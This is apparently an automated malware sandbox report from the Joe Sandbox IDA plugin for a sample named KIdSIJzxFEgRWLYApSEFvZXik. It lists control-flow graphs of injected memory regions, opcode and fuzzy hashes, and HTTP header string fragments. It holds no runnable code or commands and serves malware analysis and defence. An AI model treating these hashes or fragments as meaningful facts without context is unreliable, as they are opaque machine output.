                                                                                                                                                                          control_flow_graph 110 3074674-3074680 111 307468b-307468d 110->111 112 3074686 call 3073a1c 110->112 113 307468f-3074698 call 3073a6e 111->113 114 307469d-30746cd 111->114 112->111 113->114 117 30747e7-30747ec 114->117 118 30746d3-30746f5 114->118 118->117 120 30746fb-3074720 118->120 122 3074722-3074737 120->122 123 3074738-307475a 120->123 122->123 125 30747bf-30747c9 123->125 126 307475c-307477e 123->126 127 30747e0-30747e5 125->127 128 30747cb-30747dd call 3073673 125->128 126->125 132 3074780-30747a2 126->132 127->117 128->127 132->125 134 30747a4-30747bc 132->134 134->125
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: 87063ca7f03c968daa3ededf72a38c46cb6e7b2da7de9e3cb1b1568f7327516e
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: EE4153B6901208BFEF129F65CC44BDEBBF9EF84704F154099EA44AA254D7349640DB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 0 2ce093e-2ce095f call 2ce0cc4 call 2ce14bc call 2ce3cc0 8 2ce0967-2ce0989 0->8 10 2ce098f-2ce09d2 call 2ce09d9 8->10 11 2ce0af1-2ce0af2 8->11 15 2ce0a3d-2ce0a76 10->15 16 2ce09d4-2ce09d5 10->16 17 2ce0a7e-2ce0a80 15->17 18 2ce0a3c 16->18 19 2ce09d7-2ce09e8 call 2ce3653 16->19 20 2ce0aec call 2ce0af3 17->20 21 2ce0a82-2ce0aae 17->21 18->15 19->20 30 2ce09ee-2ce0a10 19->30 20->11 21->20 27 2ce0ab0-2ce0abc 21->27 31 2ce0ac1-2ce0ae5 27->31 30->20 34 2ce0a16-2ce0a3b 30->34 31->11 37 2ce0ae7-2ce0aea 31->37 34->20 38 2ce0a41-2ce0a76 34->38 37->20 37->31 38->17
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: ae50c36aab4f5a171fe8dbe0f9d80606aa5399d86f115cb0f5a5473561e3e639
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: CC5180316442549FEF229F20CC85B9A77BCEF44744F0401D9BA4AFE0D6DBB09694CAA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 39 2ce14bc-2ce1590 call 2ce14de call 2ce0c9c call 2ce1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
                                                                                                                                                                          • Instruction ID: 965a6c7d897dd9df6fe59c0f754f203ef6fdd9d8aaaa276a14499ab3faf1b773
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4621EEB24046149EDF03AF60C9C9DA673ECEF40704F49096A9D8AEF049FAB49554CEE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 58 2ce1345-2ce1352 59 2ce13eb-2ce13ec 58->59 60 2ce1358-2ce135e 58->60 60->59 61 2ce1364-2ce137a 60->61 61->59 63 2ce137c-2ce138f 61->63 65 2ce1391-2ce1398 63->65 66 2ce139b-2ce13ab call 2ce0e7c 65->66 69 2ce13ad-2ce13e2 66->69 69->59
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 316af92cff46ee6346745f2e2a7fea43905a2b6ca7912d35c35f56d9927a5098
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7721C031904316AFDF119F78C844B5DBBB5AF44300F094225FD59BB594D770E910CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 70 2ce14de-2ce1590 call 2ce3653 call 2ce0c9c call 2ce1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                          • Instruction ID: b439095194dc05d1f5c738cb6e4e7554d49f063a5c19dffec498dfe1073bf0ab
                                                                                                                                                                          • Opcode Fuzzy Hash: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E118FB24045549EEF03AF60C5C8CAA73ECEE40704B49096A9D8AEF449FE709554DEE5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 88 2ce3f0d-2ce3f29 call 2ce3653 call 2ce379f 93 2ce3f3b-2ce3f66 call 2ce3f78 * 3 88->93 94 2ce3f2b-2ce3f39 call 2ce401b 88->94 107 2ce3f71 93->107 102 2ce3f76-2ce3f77 94->102 107->102 108 2ce3f71 call 2ce3f78 107->108 108->102
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: 2048a36e1943d2e02837744e908cbb0f509e5ff452fafdf9f67c27751f414615
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction Fuzzy Hash: 05F01C705A83C0AAEF403BB08C4E67936B9AF40705F0405D1EA8BAF0E4DE71A550AE76
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 109 2ce4674-2ce468d call 2ce3a1c 112 2ce468f-2ce4698 call 2ce3a6e 109->112 113 2ce469d-2ce46cd 109->113 112->113 116 2ce47e7-2ce47ec 113->116 117 2ce46d3-2ce46f5 113->117 117->116 119 2ce46fb-2ce4720 117->119 121 2ce4738-2ce475a 119->121 122 2ce4722-2ce4737 119->122 124 2ce47bf-2ce47c9 121->124 125 2ce475c-2ce477e 121->125 122->121 126 2ce47cb-2ce47dd call 2ce3673 124->126 127 2ce47e0-2ce47e5 124->127 125->124 130 2ce4780-2ce47a2 125->130 126->127 127->116 130->124 133 2ce47a4-2ce47bc 130->133 133->124
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: 5376436ed26b5be65a00d8a77ec8e31f47cb47533dde2da6ebc82ec47530acf9
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: E74163B6500208BFEF229FA5CC44BEEBBBAFF80704F154059EA45AB254D7309640CF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 134 2ce4675-2ce4680 135 2ce468b-2ce468d 134->135 136 2ce4686 call 2ce3a1c 134->136 137 2ce468f-2ce4698 call 2ce3a6e 135->137 138 2ce469d-2ce46cd 135->138 136->135 137->138 141 2ce47e7-2ce47ec 138->141 142 2ce46d3-2ce46f5 138->142 142->141 144 2ce46fb-2ce4720 142->144 146 2ce4738-2ce475a 144->146 147 2ce4722-2ce4737 144->147 149 2ce47bf-2ce47c9 146->149 150 2ce475c-2ce477e 146->150 147->146 151 2ce47cb-2ce47dd call 2ce3673 149->151 152 2ce47e0-2ce47e5 149->152 150->149 155 2ce4780-2ce47a2 150->155 151->152 152->141 155->149 158 2ce47a4-2ce47bc 155->158 158->149
Strings
Memory Dump Source
• Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 3ee16f02e74d8bd8a4ec344617e53e5b4fd9fda039ebeb63b1dc870c04456e41
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: B84154B6500208BFEF125F65CC48BEEBFBAEF84704F154059EA45AB254D734D650CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 64093e-64095f call 640cc4 call 6414bc call 643cc0 8 640967-640989 0->8 10 640af1-640af2 8->10 11 64098f-6409d2 call 6409d9 8->11 15 6409d4-6409d5 11->15 16 640a3d-640a80 11->16 17 6409d7-6409e8 call 643653 15->17 18 640a3c 15->18 21 640a82-640aae 16->21 22 640aec call 640af3 16->22 17->22 29 6409ee-640a10 17->29 18->16 21->22 27 640ab0-640abc 21->27 22->10 31 640ac1-640ae5 27->31 29->22 33 640a16-640a3b 29->33 31->10 37 640ae7-640aea 31->37 33->18 33->22 37->22 37->31
Memory Dump Source
• Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: e96d5dfb642c9f933cf46becb045495f296124ac6a1a4aa1d766a6f545733eca
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: E65190316443649FFB229F20CC85B9A77BDAF04744F040199BB49FE1D6DAB09A90CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 38 6414bc-641590 call 6414de call 640c9c call 641345 * 6
Memory Dump Source
• Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction ID: 6573ae880ce0161380fb9c1b6aae23e10995215669779b09d42f28d1efaeccea
• Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction Fuzzy Hash: 552110724046149EDB43AF60C9C9CE773ECEF41704F45056AAD85EF04AFE709194CAEA
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 57 641345-641352 58 641358-64135e 57->58 59 6413eb-6413ec 57->59 58->59 60 641364-64137a 58->60 60->59 62 64137c-64138f 60->62 64 641391-641398 62->64 65 64139b-6413ab call 640e7c 64->65 68 6413ad-6413e2 65->68 68->59
Memory Dump Source
• Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 7a2101c989d1b1898141e1eb61fb38314c1e52e2e73c42f065f688fbd617b946
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: DE21C031904216AFDB129F78C844B9DBBB6AF05700F058255FD55BF694DB30ED10CB98
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 69 6414de-641590 call 643653 call 640c9c call 641345 * 6
Memory Dump Source
• Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction ID: 3f75687f006cc48877240a879f33291702171f0dbe29d01ebe283df78b334527
• Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction Fuzzy Hash: AE119E724046149EEF43AF60C5C9CAA73ECEF40704B45096EAD85EF44EFE719194CAE9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 87 643f0d-643f29 call 643653 call 64379f 92 643f3b-643f66 call 643f78 * 3 87->92 93 643f2b-643f39 call 64401b 87->93 106 643f71 92->106 100 643f76-643f77 93->100 106->100 107 643f71 call 643f78 106->107 107->100
Memory Dump Source
• Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
• Instruction ID: 089a462d86bca6321db3cb6bf6a26995c9c66c8adab490ee7658d5e41774b051
• Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
• Instruction Fuzzy Hash: A0F08C70988260AAFFC03FB08C4B74D36BAAF00705F040098BA89AD2D2CF3086548E79
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 108 644674-64468d call 643a1c 111 64469d-6446cd 108->111 112 64468f-644698 call 643a6e 108->112 115 6447e7-6447ec 111->115 116 6446d3-6446f5 111->116 112->111 116->115 118 6446fb-644720 116->118 120 644722-644737 118->120 121 644738-64475a 118->121 120->121 123 64475c-64477e 121->123 124 6447bf-6447c9 121->124 123->124 129 644780-6447a2 123->129 125 6447e0-6447e5 124->125 126 6447cb-6447dd call 643673 124->126 125->115 126->125 129->124 132 6447a4-6447bc 129->132 132->124
Strings
Memory Dump Source
• Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: 1ffc37a2d9f181ca734d549b6a35934e533461e7e1f61f12657af0ea3e034972
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: B94165B6500208BFEF129F65CC84BDEBFBAFF84704F154069EA44AA254DB34DA41CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 133 644675-644680 134 64468b-64468d 133->134 135 644686 call 643a1c 133->135 136 64469d-6446cd 134->136 137 64468f-644698 call 643a6e 134->137 135->134 140 6447e7-6447ec 136->140 141 6446d3-6446f5 136->141 137->136 141->140 143 6446fb-644720 141->143 145 644722-644737 143->145 146 644738-64475a 143->146 145->146 148 64475c-64477e 146->148 149 6447bf-6447c9 146->149 148->149 154 644780-6447a2 148->154 150 6447e0-6447e5 149->150 151 6447cb-6447dd call 643673 149->151 150->140 151->150 154->149 157 6447a4-6447bc 154->157 157->149
Strings
Memory Dump Source
• Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 12fb807f4fd22617bb7a008deae1056eeade87e16da79b29d8fd5e82daac965f
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: 0C4184B6500208BFEF125F65CC49BDEBFBAFF80704F154069EA44AA254DB34DA40CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
control_flow_graph 0 6d093e-6d095f call 6d0cc4 call 6d14bc call 6d3cc0 8 6d0967-6d0989 0->8 10 6d098f-6d09d2 call 6d09d9 8->10 11 6d0af1-6d0af2 8->11 15 6d0a3d-6d0a80 10->15 16 6d09d4-6d09d5 10->16 21 6d0aec call 6d0af3 15->21 22 6d0a82-6d0aae 15->22 17 6d0a3c 16->17 18 6d09d7-6d09e8 call 6d3653 16->18 17->15 18->21 29 6d09ee-6d0a10 18->29 21->11 22->21 27 6d0ab0-6d0abc 22->27 31 6d0ac1-6d0ae5 27->31 29->21 33 6d0a16-6d0a3b 29->33 31->11 37 6d0ae7-6d0aea 31->37 33->17 33->21 37->21 37->31
Memory Dump Source
• Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 494989da3fde10c1487aa86c210de388f75be9d0b6a81113bc0aa542d37bd79e
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: F551A131A443549FFB129F20CC85B997BBDAF04740F0801DABA45FE1D6DAB09A90CB69
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 38 6d14bc-6d1590 call 6d14de call 6d0c9c call 6d1345 * 6
Memory Dump Source
• Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction ID: a6c348583d3674c589305c0e444934590be920f5fac5dbc3b4a493394fd78151
• Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction Fuzzy Hash: 76211072804614AEDB43AF60C9C9CA773ECEF40704F45056BAD85EF04AFE749154CAEA
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 57 6d1345-6d1352 58 6d1358-6d135e 57->58 59 6d13eb-6d13ec 57->59 58->59 60 6d1364-6d137a 58->60 60->59 62 6d137c-6d138f 60->62 64 6d1391-6d1398 62->64 65 6d139b-6d13ab call 6d0e7c 64->65 68 6d13ad-6d13e2 65->68 68->59
Memory Dump Source
• Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 79fa92490a1b5b5183fa43e601cda26c51d823ac5f50d93a1aae4003c565d19a
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: A121AE31904216AFDB119E78C844B9DBBB6AF05300F054216F955FF694DB70AD00CB94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 69 6d14de-6d1590 call 6d3653 call 6d0c9c call 6d1345 * 6
Memory Dump Source
• Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction ID: 6caf88facb66cc6e8390f50a76d2dffd46f47a61754a21a88bd8169047cf72d9
• Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction Fuzzy Hash: 0911EF72804614AEEF43AF20C5C8CAA73ECEF40704B45096FAD85EF54AFE719154CAE9
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 87 6d3f0d-6d3f29 call 6d3653 call 6d379f 92 6d3f3b-6d3f66 call 6d3f78 * 3 87->92 93 6d3f2b-6d3f39 call 6d401b 87->93 106 6d3f71 92->106 101 6d3f76-6d3f77 93->101 106->101 107 6d3f71 call 6d3f78 106->107 107->101
Memory Dump Source
• Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
• Instruction ID: 0e589a3b04657eee8c8df0e79da85aae84673deab581ec01fb087b2c4530b02c
• Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
• Instruction Fuzzy Hash: 3CF012B0D88264A7EF803F708C4B65936B55F40706F040996FA49AD3D6DE7086509E7A
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 133 6d4675-6d468d call 6d3a1c 136 6d469d-6d46cd 133->136 137 6d468f-6d4698 call 6d3a6e 133->137 140 6d47e7-6d47ec 136->140 141 6d46d3-6d46f5 136->141 137->136 141->140 143 6d46fb-6d4720 141->143 145 6d4738-6d475a 143->145 146 6d4722-6d4737 143->146 148 6d475c-6d477e 145->148 149 6d47bf-6d47c9 145->149 146->145 148->149 154 6d4780-6d47a2 148->154 150 6d47cb-6d47dd call 6d3673 149->150 151 6d47e0-6d47e5 149->151 150->151 151->140 154->149 157 6d47a4-6d47bc 154->157 157->149
Strings
Memory Dump Source
• Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: f03a73a6d16f6a6e2c8e5f9b7fc5f485270921d9deee4251ce86b32813dd64b2
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: 094166B6900208BFEF125F65CC48BDEBFBAEF84704F154069EA44AA354DB34DA50CB94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 108 6d4674-6d4680 109 6d468b-6d468d 108->109 110 6d4686 call 6d3a1c 108->110 111 6d469d-6d46cd 109->111 112 6d468f-6d4698 call 6d3a6e 109->112 110->109 115 6d47e7-6d47ec 111->115 116 6d46d3-6d46f5 111->116 112->111 116->115 118 6d46fb-6d4720 116->118 120 6d4738-6d475a 118->120 121 6d4722-6d4737 118->121 123 6d475c-6d477e 120->123 124 6d47bf-6d47c9 120->124 121->120 123->124 129 6d4780-6d47a2 123->129 125 6d47cb-6d47dd call 6d3673 124->125 126 6d47e0-6d47e5 124->126 125->126 126->115 129->124 132 6d47a4-6d47bc 129->132 132->124
Strings
Memory Dump Source
• Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: 40a0643fcd8f3225370fe917a06f2e0fee5c5326b2571c4c4786c97b307fc593
